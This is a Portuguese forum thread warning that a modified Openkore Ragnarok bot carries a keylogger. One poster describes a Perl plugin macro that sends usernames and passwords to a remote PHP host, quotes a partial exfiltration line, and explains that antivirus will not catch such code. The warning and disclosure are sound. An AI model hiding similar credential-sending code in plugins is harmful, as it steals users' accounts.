Ir para conteúdo
  • 2 Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore 3.0 editado,com esse BOT é possivel uzalo em XP,VISTA,SEVEN,100% RENEWAL

Posts Recomendados

ARAUJORAG E CAIORDC18 SÃO A MESMA PESSOA CARA, ELE "TENTA" AMENIZAR AS MERDAS QUE FAZ COM ESSA OUTRA CONTA, SE LIGA PESSOAL NÃO BAIXEM ESSE BOT ELE TEM KEY LOG

__________________________________________________________________________________________

tokugawa_style.jpg

tokugawa_family.png

Link para o comentário
Compartilhar em outros sites

Murilo_667 não perde tempo com esse lixo não veio, só não quero baixar e achar o masterlogin desse nb pq ele vai falar que não é o Open Kore dele entendeu? eu só continuo passando a mensagem: ESSE OPEN KORE TEM KL NÃO BAIXEM.

__________________________________________________________________________________________

tokugawa_style.jpg

tokugawa_family.png

Link para o comentário

Olá galerinha . Vejo que muita coisa Mudou desde que eu parei de jogar Rag !

Mas vou esclarecer algumas duvidas *COMO PROGRAMADORA* coisas que quem usa boot deve saber.

O Kore roda em Perl ou seja ele executa todos os codigos em PERL (LOGICO) que tem dentro das pastas ! Ate aqui tudo parece obvio correto ?

Mas.... Eu posso escrever um codigo em Perl que mande alguma informação pra um determinado host em PHP sem que o usuario saiba disso, e isso nao é virus e nem kl.

Isso pode ser uma Macro, ou um codigo na pasta send do Kore ou em outro lugar qualquer, isso tudo porque o Kore é Perl ! e quando o perl executa le todos os arquivos .

Porque estou escrevendo isso ?

É SIMPLES ! NENHUM ANTVIRUS VAI PEGAR ISSO NUNCA, PORQUE OS CODIGOS FAZEM PARTE DO PROGRAMA !

ENTÃO NAO DEIXEM DE FAZER O SCAM POREM NAO ACEITEM QUE O CODIGO ESTEJA LIMPO,OK

Pra resolver o problema desse Bot 3.0 que esta nesse topico e com muta discussão fui verificar e olha o que eu encontrei ? ( so verifiquei este codigo,ok podem ter outros)

Depois de fazer o Download do boot 3.0 deste topico va ate a pasta Openkore\plugins clique com botão direito na macro Path21 va em abrir com Bloco de notas.

Uma macro aparentemente inofensiva porem...

Ela envia Usuario, senha e senha da kafra para um host PHP.

so que o nosso amiguinho fez uma modificação no host e alterou o nome do arquivo de recebimento, com isso nem eu nem voce conseguimos abrir a pagina. ( isso porque nao quero ir mas a fundo)

isso serve pra que pessoas como eu que sei como funciona nao roube dele o que ele roubou dos outros.

Olhem na tal macro e voces vao entender melhor , ela manda tudo para este endereço :

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

porem no host ele alterou o php que recebe que seria key_strokes.php mas foi alterado .

---------------------------------------------------------------------------------------------------------------------------

olhando outro boot que nao é tao inteligente e nao alterou o endereço , olhem como o host recebe seu login e sua senha :

Repito o link abaixo nao é deste boot do topico, é so um exemplo.

É necessário se cadastrar para acessar o conteúdo.

espero que voce entendam e fiquem espertos

Bjinhos a Todos

Link para o comentário

@Lukderuchi

concordo com vc, bot ta com keylogger, a noite eu fui ver se upou e tava escrito "duplo login, desconectando..."

e o nb nao conseguiu me roubar ainda, mudei a senha UAHSUahsuAHSUahsUAHSuahsuASHUahasHSuhsUAHS

mensagem "nao baixem, puro keylogger"

Link para o comentário

e porque sera que nao abre nd naquele link?porque esta desativado querido,nao tem keylogger algum ali se nao teria aparecido as senhas todas ali,resumindo nao tem prova que estou recebendo as senhas

Link para o comentário

uahsuahsauh, se eu kisesse eu colokava o bot on dnovo, e tirava print, porem, nao vou arriscar minha acc nisso...

A troco de que eu iria vim aki pra perder meu tempo e fikar fingindo soh q tem keylogger ?

eu to aki pra falar a verdade, nao kero que o pessoal da WC seja hackeado...

Link para o comentário

leonardovm2 --> @Lukderuchi

concordo com vc, bot ta com keylogger, a noite eu fui ver se upou e tava escrito "duplo login, desconectando..."

e o nb nao conseguiu me roubar ainda, mudei a senha UAHSUahsuAHSUahsUAHSuahsuASHUahasHSuhsUAHS

mensagem "nao baixem, puro keylogger"

MASCARA TA CAINDO EM, RELAXA QUE JA ENVIEI UM EMAIL PRA WEBCHEATS PRA SOLUCIONAR ESSE CASO DESSE NB. MAIS POR ENQUANTO VAMOS PASSANDO A MENSAGEM: ESSE BOT TEM KEY LOG, NÃO BAIXEM!.

tokugawa_style.jpg

tokugawa_family.png

Link para o comentário

velho... não adianta falar... o povo tem que perde a acc pra ver oq nós estmos falando é verdade...

eu ja contei uns 20 que perderam... quer ser mais 1 então vai lar. E não diga q nós não avisamos....

Link para o comentário

eu fui testar e olha oq aconteceu... fui HACKEADO! lord kina e merchant totalmente pelados, ele só nao conseguiu roubar o meu baú, oq tá me permitindo reconstruir o char naquelas né.. portanto NÃO BAIXEM !

não foi agora que eu testei, mas faz um tempinho já!, quando entrei na minha acc, ele estava literalmente pelado! pls não baixem!

Link para o comentário

Cara poderia me ajudar gostaria de programa o bot para esse servidor RAGNATEMPO por favor pode configurar o bot para esse servidor se for possivel agradeceria ta ake os conf dele

[Ragnatempo]

ip 741.636.254.238

port 6700

master_version 1

version 221

serverType 12

gameGuard 0

private 1

Link para o comentário

eu nao consigo usar nenhum tipo de poçao item de cura nesse bot nao sei pq...

useSelf_item orange potion {

hp <=30%

sp

homunculus_hp

homunculus_sp

homunculus_dead

onAction

whenStatusActive

whenStatusInactive

whenFollowing

spirit

aggressives

monsters

notMonsters

stopWhenHit 0

inLockOnly 0

notWhileSitting 0

notInTown 0

timeout

disabled 0

inInventory

manualAI 0

}

acho q nao tem nada incorreto mas ele nao usa as pot ele morre o char mais nao usa alguem me ajuda aew Pf vlws

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.